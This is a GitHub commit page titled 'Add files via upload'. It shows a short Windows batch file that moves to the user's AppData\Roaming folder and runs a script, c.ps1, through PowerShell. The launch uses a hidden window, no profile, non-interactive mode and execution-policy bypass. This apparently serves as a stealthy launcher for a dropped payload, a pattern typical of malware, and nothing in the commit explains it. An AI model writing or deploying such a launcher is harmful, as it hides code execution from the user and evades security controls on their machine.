Add files via upload

This commit is contained in:
atomic
2022-09-17 16:03:33 -04:00
committed by GitHub
parent f8c77804f2
commit d24014a60c
22 changed files with 995 additions and 0 deletions
+3
View File
@@ -0,0 +1,3 @@
@echo off
powershell -Command "& {cd "$env:userprofile\AppData\Roaming"; powershell -w h -NoP -NonI -Ep Bypass -File "c.ps1"}"
pause